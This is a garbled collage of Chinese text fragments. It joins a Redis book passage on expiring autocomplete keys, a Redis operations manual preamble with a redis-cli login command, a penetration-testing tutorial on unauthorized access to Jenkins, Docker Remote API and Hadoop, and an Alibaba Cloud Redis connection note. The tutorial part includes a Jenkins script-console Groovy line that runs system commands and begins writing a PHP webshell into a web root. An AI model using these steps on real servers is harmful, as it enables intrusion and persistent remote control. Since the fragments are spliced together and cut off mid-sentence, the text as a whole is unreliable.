前⾯的《有序集合》⼀章曾经介绍过如何使⽤有序集合来实现⾃动补全功能， 但是如果我们仔细地分 析这个⾃动补全程序， 就会发现它有⼀个潜在的问题： 为了实现⾃动补全功能， 程序需要创建⼤量⾃动补全结 果， ⽽补全结果的数量越多、体积越⼤， 需要耗费的内存也会越多。 为了尽可能地节约内存， ⼀个⾼效的⾃动补全程序应该只储存热⻔关键字的⾃动补全结果， 并移除那些⽆⼈访问 的冷⻔关键字的⾃动补全结果。 要做到这⼀点， 其中⼀种⽅ 为⽤户输⼊的关键字构建⼀个排⾏榜， 然后定期地删除排名靠后关键字的⾃动补全结果。 排⾏榜的⽅法虽然可⾏， 但是却需要使⽤程序定期删除⾃动补全结果， 使⽤起来相当麻烦。 ⼀个更⽅便也更优雅 的⽅法， 就是使⽤ EXPIRE 命令和 PEXPIRE 命令的更新特性去实现⾃动的冷⻔数据淘汰机制： 为此， 我们可以修 改⾃动补全程序， 让它在每次处理⽤户输⼊的时候， 为相应关键字的⾃动补全结果设置⽣存时间。 这样⼀来， 对于⽤户经常输⼊的那些关键字， 对于⽤户经常输⼊的那些关键字， 它们的⾃动补全结果的⽣存时间将会不断得到更新， 从⽽产⽣出⼀种“续期”效 果， 使得热⻔关键字的⾃动补全结果可以不断地存在下去， ⽽冷⻔关键字的⾃动补全结果则会由于⽣存时间得不 到更新⽽⾃动被移除。 经过上述修改， ⾃动补全程序就可以在⽆需⼿动删除冷⻔数据的情况下， 通过⾃动的数据淘汰机制达到节约内存 的⽬的， 代码清单 12-5 展示了修改后的⾃动补全程序。 代码清单 12-5

Redis操作手册 前言： 1.蓝色字体表示命令行命令，正式执行时不要复制前面的#号，#号只是提示应 该使用root权限操作 2.绿色字体表示注释，有时注释太多就不用绿色表示了 3.注意：本文档的所有操作请先在测试机里进行实践，请不要直接在真实的服 务器中操作！ 版权声明： 本文档以开源的形式发布，所有条款如下： （1）无担保：作者不保证文档内容的准确无误，亦不承担由于使用此文档所导致的任何后果 start redis # systemctl status redis ★redis使用ssl ★redis-cli客户端工具 ★命令行客户端 在redis服务端安装目录下有redis-cli命令行工具 安装目录下# redis-cli -h 10.99.1.51 -p 6379 -a Centos123 #-h指定服务器地 址， # -p指定端口，-a指定密码

168.18.129:8080/ 如下图所示说明环境搭建成功 点击“脚本命令执行” 执行系统命令 网站路径：/var/www/html （需要具备一定的权限） 利用“脚本命令行”写webshell，点击运行没有报错,写入成功 println "whoami".execute().text new File ("/var/www/html/shell.php").write('< 器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、 OpenStack 集群和其他的基础应用平台Docker。 Docker Remote API 是一个取代远程命令行界面（rcli）的REST API。存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API，通过 这个接口，我们可以新建 漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如 进行删除，下载，目录浏览甚至命令执行等操作，产生极大的危害。 漏洞利用 环境介绍 环境搭建 未授权访问测试 目标靶机：Kali ip地址：192

版仅支持阿里云内网访问，不支持外网访问，即只有在同节点的 ECS 上安装 Redis-cli 才能与 云数据库建立连接并进行数据操作。 说明：Redis-cli 是 Redis 原生的命令行工具，可以先下载安装 Redis 即可使用 Redis-cli。在 ECS 上安 装 Redis 的命令请参考 Redis 官方网页。 Redis-cli 连接云数据库 Redis 版的命令如下：